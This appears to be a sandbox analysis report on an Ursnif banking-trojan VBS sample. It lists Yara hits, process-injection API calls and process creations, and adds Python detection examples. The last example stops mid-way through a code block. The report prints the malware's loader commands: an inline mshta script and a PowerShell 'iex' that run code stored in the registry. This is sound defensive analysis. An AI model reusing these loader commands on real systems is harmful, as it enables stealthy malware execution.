Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

System Summary:

Contains functionality to call native functions
Source: C:\Windows\explorer.exe Code function: 36_2_04CF6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 36_2_04CF6F64
Source: C:\Windows\explorer.exe Code function: 36_2_04CE33F8 NtQueryInformationProcess, 36_2_04CE33F8
Source: C:\Windows\explorer.exe Code function: 36_2_04D21003 NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_04D21003
Source: C:\Windows\System32\control.exe Code function: 37_2_005568E0 NtReadVirtualMemory, 37_2_005568E0
Source: C:\Windows\System32\control.exe Code function: 37_2_005670B8 NtMapViewOfSection, 37_2_005670B8
Source: C:\Windows\System32\control.exe Code function: 37_2_00561154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 37_2_00561154
Source: C:\Windows\System32\control.exe Code function: 37_2_005729D0 NtAllocateVirtualMemory, 37_2_005729D0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055C188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_0055C188
Source: C:\Windows\System32\control.exe Code function: 37_2_00569B08 NtCreateSection, 37_2_00569B08
Source: C:\Windows\System32\control.exe Code function: 37_2_005533F8 NtQueryInformationProcess, 37_2_005533F8
Source: C:\Windows\System32\control.exe Code function: 37_2_00552CC0 NtQueryInformationProcess, 37_2_00552CC0
Source: C:\Windows\System32\control.exe Code function: 37_2_00557F44 NtWriteVirtualMemory, 37_2_00557F44
Source: C:\Windows\System32\control.exe Code function: 37_2_00566F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_00566F64
Source: C:\Windows\System32\control.exe Code function: 37_2_00591003 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_00591003
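The native calls listed above for control.exe (NtCreateSection, NtMapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, CreateRemoteThread with ResumeThread, NtUnmapViewOfSection) are the building blocks of the cross-process injection the report flags elsewhere ("Maps a DLL or memory area into another process", "Modifies the context of a thread in another process"). The following is an added example, not code from the report or from the sandbox: a small detector that pairs a "code delivered into a foreign process" call with a later "execution transferred" call from the same injector to the same victim, run over a constructed API trace. The trace shape, the API name sets, and the injection direction (control.exe PID 3596 into explorer.exe PID 3508, taken from the PIDs the report lists for the Yara matches) are assumptions.

```python
"""Pair 'code delivered to a foreign process' with 'execution transferred' in an API trace (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ApiCall:
    pid: int                          # process making the call
    name: str                         # API name as an API monitor would log it
    target_pid: Optional[int] = None  # process the handle argument resolves to, if any


# Calls that put bytes into another process's address space (assumed set).
DELIVER = {"NtMapViewOfSection", "NtWriteVirtualMemory", "WriteProcessMemory"}
# Calls that make another process run those bytes (assumed set).
EXECUTE = {"NtSetContextThread", "SetThreadContext", "CreateRemoteThread",
           "NtCreateThreadEx", "RtlCreateUserThread", "NtQueueApcThread"}


def injection_chains(trace: List[ApiCall]) -> List[Tuple[int, int, str]]:
    """Return (injector, victim, 'deliver-call then execute-call') for each completed chain.

    Only cross-process calls count: a process mapping a section into itself is
    ordinary loader behaviour and must not fire.
    """
    pending = {}   # (injector, victim) -> first delivery API seen for that pair
    chains = []
    for call in trace:
        if call.target_pid is None or call.target_pid == call.pid:
            continue
        key = (call.pid, call.target_pid)
        if call.name in DELIVER:
            pending.setdefault(key, call.name)
        elif call.name in EXECUTE and key in pending:
            chains.append((call.pid, call.target_pid, f"{pending.pop(key)} then {call.name}"))
    return chains


# Constructed trace. PIDs 3596 (control.exe) and 3508 (explorer.exe) are the report's;
# the order of calls and the injection direction are assumptions.
SAMPLE_TRACE = [
    ApiCall(3596, "NtCreateSection"),
    ApiCall(3596, "NtMapViewOfSection", 3596),   # map into self: not a chain
    ApiCall(3596, "NtMapViewOfSection", 3508),   # map the same section into explorer.exe
    ApiCall(3596, "NtProtectVirtualMemory", 3508),
    ApiCall(3596, "NtSetContextThread", 3508),   # point an explorer.exe thread at the mapping
    ApiCall(3596, "NtUnmapViewOfSection", 3596),
    ApiCall(4444, "NtReadVirtualMemory", 3508),  # a reader (e.g. a diagnostic tool) never delivers code
]

if __name__ == "__main__":
    for injector, victim, how in injection_chains(SAMPLE_TRACE):
        print(f"pid {injector} injected into pid {victim}: {how}")
```

The pairing is deliberately stateful per (injector, victim): a single NtMapViewOfSection into another process also happens in benign code (shared-memory IPC), and a lone NtSetContextThread is what a debugger does, so neither alone is a verdict. A practitioner running this against real tracer output will also want to resolve section handles, since the report's sequence maps one section into both the injector and the victim before changing the victim's thread context.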
Detected potential crypto function
Source: C:\Windows\explorer.exe Code function: 36_2_04CFAE80 36_2_04CFAE80
Source: C:\Windows\explorer.exe Code function: 36_2_04CF2F90 36_2_04CF2F90
Source: C:\Windows\explorer.exe Code function: 36_2_04CE7CCC 36_2_04CE7CCC
Source: C:\Windows\explorer.exe Code function: 36_2_04CE34A0 36_2_04CE34A0
Source: C:\Windows\explorer.exe Code function: 36_2_04CEBC1C 36_2_04CEBC1C
Source: C:\Windows\explorer.exe Code function: 36_2_04CF7434 36_2_04CF7434
Source: C:\Windows\explorer.exe Code function: 36_2_04CE3D81 36_2_04CE3D81
Source: C:\Windows\explorer.exe Code function: 36_2_04CFEDA0 36_2_04CFEDA0
Source: C:\Windows\explorer.exe Code function: 36_2_04CEB55C 36_2_04CEB55C
Source: C:\Windows\explorer.exe Code function: 36_2_04D0FD7C 36_2_04D0FD7C
Source: C:\Windows\explorer.exe Code function: 36_2_04CF7D60 36_2_04CF7D60
Source: C:\Windows\explorer.exe Code function: 36_2_04CE4578 36_2_04CE4578
Source: C:\Windows\explorer.exe Code function: 36_2_04D0AD28 36_2_04D0AD28
Source: C:\Windows\explorer.exe Code function: 36_2_04D02E04 36_2_04D02E04
Source: C:\Windows\explorer.exe Code function: 36_2_04CE5628 36_2_04CE5628
Source: C:\Windows\explorer.exe Code function: 36_2_04CE8FC8 36_2_04CE8FC8
Source: C:\Windows\explorer.exe Code function: 36_2_04CF9FD0 36_2_04CF9FD0
Source: C:\Windows\explorer.exe Code function: 36_2_04D0DFF8 36_2_04D0DFF8
Source: C:\Windows\explorer.exe Code function: 36_2_04CF07AC 36_2_04CF07AC
Source: C:\Windows\explorer.exe Code function: 36_2_04CEAF44 36_2_04CEAF44
Source: C:\Windows\explorer.exe Code function: 36_2_04D01F74 36_2_04D01F74
Source: C:\Windows\explorer.exe Code function: 36_2_04CE9F7C 36_2_04CE9F7C
Source: C:\Windows\explorer.exe Code function: 36_2_04CE4734 36_2_04CE4734
Source: C:\Windows\explorer.exe Code function: 36_2_04D0D72C 36_2_04D0D72C
Source: C:\Windows\explorer.exe Code function: 36_2_04D0B0F8 36_2_04D0B0F8
Source: C:\Windows\explorer.exe Code function: 36_2_04D0F8E8 36_2_04D0F8E8
Source: C:\Windows\explorer.exe Code function: 36_2_04D08844 36_2_04D08844
Source: C:\Windows\explorer.exe Code function: 36_2_04CE207C 36_2_04CE207C
Source: C:\Windows\explorer.exe Code function: 36_2_04CE8824 36_2_04CE8824
Source: C:\Windows\explorer.exe Code function: 36_2_04D059F8 36_2_04D059F8
Source: C:\Windows\explorer.exe Code function: 36_2_04CEC188 36_2_04CEC188
Source: C:\Windows\explorer.exe Code function: 36_2_04CE3908 36_2_04CE3908
Source: C:\Windows\explorer.exe Code function: 36_2_04D0610C 36_2_04D0610C
Source: C:\Windows\explorer.exe Code function: 36_2_04CEA2EC 36_2_04CEA2EC
Source: C:\Windows\explorer.exe Code function: 36_2_04D082E0 36_2_04D082E0
Source: C:\Windows\explorer.exe Code function: 36_2_04CF6A74 36_2_04CF6A74
Source: C:\Windows\explorer.exe Code function: 36_2_04D0D26C 36_2_04D0D26C
Source: C:\Windows\explorer.exe Code function: 36_2_04CFCA04 36_2_04CFCA04
Source: C:\Windows\explorer.exe Code function: 36_2_04CF021C 36_2_04CF021C
Source: C:\Windows\explorer.exe Code function: 36_2_04CF0BB0 36_2_04CF0BB0
Source: C:\Windows\explorer.exe Code function: 36_2_04D00354 36_2_04D00354
Source: C:\Windows\explorer.exe Code function: 36_2_04CFE35C 36_2_04CFE35C
Source: C:\Windows\explorer.exe Code function: 36_2_04D09344 36_2_04D09344
Source: C:\Windows\explorer.exe Code function: 36_2_04CE7B14 36_2_04CE7B14
Source: C:\Windows\explorer.exe Code function: 36_2_04CFC324 36_2_04CFC324
Source: C:\Windows\explorer.exe Code function: 36_2_04D21570 36_2_04D21570
Source: C:\Windows\System32\control.exe Code function: 37_2_0055C188 37_2_0055C188
Source: C:\Windows\System32\control.exe Code function: 37_2_0056AE80 37_2_0056AE80
Source: C:\Windows\System32\control.exe Code function: 37_2_00562F90 37_2_00562F90
Source: C:\Windows\System32\control.exe Code function: 37_2_00578844 37_2_00578844
Source: C:\Windows\System32\control.exe Code function: 37_2_0055207C 37_2_0055207C
Source: C:\Windows\System32\control.exe Code function: 37_2_00558824 37_2_00558824
Source: C:\Windows\System32\control.exe Code function: 37_2_0057B0F8 37_2_0057B0F8
Source: C:\Windows\System32\control.exe Code function: 37_2_0057F8E8 37_2_0057F8E8
Source: C:\Windows\System32\control.exe Code function: 37_2_0057610C 37_2_0057610C
Source: C:\Windows\System32\control.exe Code function: 37_2_00553908 37_2_00553908
Source: C:\Windows\System32\control.exe Code function: 37_2_005759F8 37_2_005759F8
Source: C:\Windows\System32\control.exe Code function: 37_2_00566A74 37_2_00566A74
Source: C:\Windows\System32\control.exe Code function: 37_2_0057D26C 37_2_0057D26C
Source: C:\Windows\System32\control.exe Code function: 37_2_0056021C 37_2_0056021C
Source: C:\Windows\System32\control.exe Code function: 37_2_0056CA04 37_2_0056CA04
Source: C:\Windows\System32\control.exe Code function: 37_2_005782E0 37_2_005782E0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055A2EC 37_2_0055A2EC
Source: C:\Windows\System32\control.exe Code function: 37_2_00570354 37_2_00570354
Source: C:\Windows\System32\control.exe Code function: 37_2_0056E35C 37_2_0056E35C
Source: C:\Windows\System32\control.exe Code function: 37_2_00579344 37_2_00579344
Source: C:\Windows\System32\control.exe Code function: 37_2_00557B14 37_2_00557B14
Source: C:\Windows\System32\control.exe Code function: 37_2_0056C324 37_2_0056C324
Source: C:\Windows\System32\control.exe Code function: 37_2_00560BB0 37_2_00560BB0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055BC1C 37_2_0055BC1C
Source: C:\Windows\System32\control.exe Code function: 37_2_00567434 37_2_00567434
Source: C:\Windows\System32\control.exe Code function: 37_2_00557CCC 37_2_00557CCC
Source: C:\Windows\System32\control.exe Code function: 37_2_005534A0 37_2_005534A0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055B55C 37_2_0055B55C
Source: C:\Windows\System32\control.exe Code function: 37_2_0057FD7C 37_2_0057FD7C
Source: C:\Windows\System32\control.exe Code function: 37_2_00554578 37_2_00554578
Source: C:\Windows\System32\control.exe Code function: 37_2_00567D60 37_2_00567D60
Source: C:\Windows\System32\control.exe Code function: 37_2_0057AD28 37_2_0057AD28
Source: C:\Windows\System32\control.exe Code function: 37_2_00553D81 37_2_00553D81
Source: C:\Windows\System32\control.exe Code function: 37_2_0056EDA0 37_2_0056EDA0
Source: C:\Windows\System32\control.exe Code function: 37_2_00572E04 37_2_00572E04
Source: C:\Windows\System32\control.exe Code function: 37_2_00555628 37_2_00555628
Source: C:\Windows\System32\control.exe Code function: 37_2_0055AF44 37_2_0055AF44
Source: C:\Windows\System32\control.exe Code function: 37_2_00571F74 37_2_00571F74
Source: C:\Windows\System32\control.exe Code function: 37_2_00559F7C 37_2_00559F7C
Source: C:\Windows\System32\control.exe Code function: 37_2_00554734 37_2_00554734
Source: C:\Windows\System32\control.exe Code function: 37_2_0057D72C 37_2_0057D72C
Source: C:\Windows\System32\control.exe Code function: 37_2_00569FD0 37_2_00569FD0
Source: C:\Windows\System32\control.exe Code function: 37_2_00558FC8 37_2_00558FC8
Source: C:\Windows\System32\control.exe Code function: 37_2_0057DFF8 37_2_0057DFF8
Source: C:\Windows\System32\control.exe Code function: 37_2_005607AC 37_2_005607AC
Java / VBScript file with very long strings (likely obfuscated code)
Source: my_presentation_96642.vbs Initial sample: Strings found which are bigger than 50
PE file does not import any functions
Source: a11zr31h.dll.32.dr Static PE information: No import functions for PE file found
Source: x0s3qhtp.dll.34.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@24/51@4/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4B9FB8E4-F8AF-11EA-90E2-ECF4BB862DED}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{226BE949-19F0-A41A-B376-5D18970AE1CC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{2AD27732-815B-ECFE-5BFE-45E0BF124914}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_01
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: my_presentation_96642.vbs Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: my_presentation_96642.vbs Static file information: File size 1185685 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.623592484.000001DE2A0D0000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.634178793.000001EE050C0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
Source: Binary string: c:\25\Ready\death\Soil\Original\41\84\Play\49\Believe\settle\gun\shout\24\note.pdb source: Greenbelt.iso.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp
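The process creations above record the whole delivery chain: wscript.exe runs the .vbs, mshta.exe is launched with an inline about:&lt;hta:application&gt; script that reads and evals a value under HKCU\Software\AppDataLow\Software\Microsoft\{GUID}, that HTA spawns powershell.exe which does iex on another value from the same key, and PowerShell has csc.exe compile C# from .cmdline response files in %TEMP% before control.exe -h is started. Below is an added example, not code from the report or from the sandbox vendor, that runs four process-creation rules over constructed events built from the command lines shown above. The event shape (Sysmon event 1 style fields), the PIDs, the parent images, and the set of shell children used for the mshta rule are assumptions.

```python
"""Hunt for the mshta -> powershell -> csc.exe chain this report records (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields a Sysmon event 1 would carry)."""
    pid: int
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Children that, spawned by mshta.exe, mean HTA content ran a shell (assumed set, modelled on the Sigma rule).
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "reg.exe", "regsvr32.exe", "bitsadmin.exe"}
TEMP_RESPONSE_FILE = re.compile(r"\\AppData\\Local\\Temp\\[^\s'\"]+\.cmdline", re.IGNORECASE)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
REG_READ = re.compile(r"\b(gp|get-itemproperty)\b[^)]*HKCU:", re.IGNORECASE)


def mshta_spawns_shell(ev: ProcEvent) -> Optional[str]:
    if basename(ev.parent_image) == "mshta.exe" and basename(ev.image) in SHELL_CHILDREN:
        return "mshta spawned %s" % basename(ev.image)
    return None


def inline_hta_reading_registry(ev: ProcEvent) -> Optional[str]:
    cmd = ev.command_line.lower()
    if basename(ev.image) == "mshta.exe" and "<hta:application>" in cmd and "regread(" in cmd:
        return "mshta ran an inline about: HTA that evals a registry value"
    return None


def powershell_iex_from_registry(ev: ProcEvent) -> Optional[str]:
    # Ursnif keeps its stages as values under HKCU\Software\AppDataLow\Software\Microsoft\{GUID};
    # the rule only needs 'iex' plus a Get-ItemProperty on HKCU to fire.
    if basename(ev.image) == "powershell.exe" and IEX.search(ev.command_line) and REG_READ.search(ev.command_line):
        return "powershell iex of code read from HKCU"
    return None


def csc_temp_response_file(ev: ProcEvent) -> Optional[str]:
    if basename(ev.image) == "csc.exe" and TEMP_RESPONSE_FILE.search(ev.command_line):
        return "csc.exe compiling from a Temp .cmdline response file"
    return None


RULES: List[Callable[[ProcEvent], Optional[str]]] = [
    mshta_spawns_shell, inline_hta_reading_registry, powershell_iex_from_registry, csc_temp_response_file]


def hunt(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Run every rule over every event; return (pid, reason) per hit in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((ev.pid, reason))
    return hits


# Constructed events: command lines copied from the report, PIDs and parents assumed.
SAMPLE_EVENTS = [
    ProcEvent(4100, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'"""),
    ProcEvent(4200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\mshta.exe",
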